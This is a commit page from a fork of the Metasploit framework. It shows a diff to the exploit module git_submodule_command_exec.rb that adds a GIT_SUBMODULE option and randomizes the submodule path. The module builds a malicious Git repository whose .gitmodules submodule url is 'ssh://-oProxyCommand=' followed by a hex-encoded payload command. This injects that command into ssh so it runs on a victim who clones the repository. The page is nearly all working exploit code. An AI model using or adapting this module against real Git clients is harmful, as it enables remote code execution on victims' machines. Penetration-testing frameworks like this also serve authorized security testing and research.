adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

randomize submodule path

Browse Source
This commit is contained in:
Tim
2017-08-29 16:54:08 +08:00
parent 7881a7ddc4
commit 39299c0fb8
1 changed files with 9 additions and 3 deletions
Download Patch File Download Diff File Expand all files Collapse all files
modules/exploits/multi/http/git_submodule_command_exec.rb
+9 -3
View File
@@ -55,6 +55,7 @@ class MetasploitModule < Msf::Exploit::Remote
register_options(
[
OptString.new('GIT_URI', [false, 'The URI to use as the malicious Git instance (empty for random)', '']),
OptString.new('GIT_SUBMODULE', [false, 'The path to use as the malicious git submodule (empty for random)', '']),
]
)
end
@@ -76,15 +77,20 @@ class MetasploitModule < Msf::Exploit::Remote
payload_cmd = payload.encoded + " &"
payload_cmd = Rex::Text.to_hex(payload_cmd, prefix = '%')
gitmodules = "[submodule \"test\"]
path = test
submodule_path = datastore['GIT_SUBMODULE']
if submodule_path.blank?
submodule_path = Rex::Text.rand_text_alpha(rand(8) + 2).downcase
end
gitmodules = "[submodule \"#{submodule_path}\"]
path = #{submodule_path}
url = ssh://-oProxyCommand=#{payload_cmd}/
"
sha1, content = build_object('blob', gitmodules)
@repo_data[:git][:files]["/objects/#{get_path(sha1)}"] = content
tree = "100644 .gitmodules\0#{[sha1].pack('H*')}"
tree += "160000 test\0#{[sha1].pack('H*')}"
tree += "160000 #{submodule_path}\0#{[sha1].pack('H*')}"
sha1, content = build_object('tree', tree)
@repo_data[:git][:files]["/objects/#{get_path(sha1)}"] = content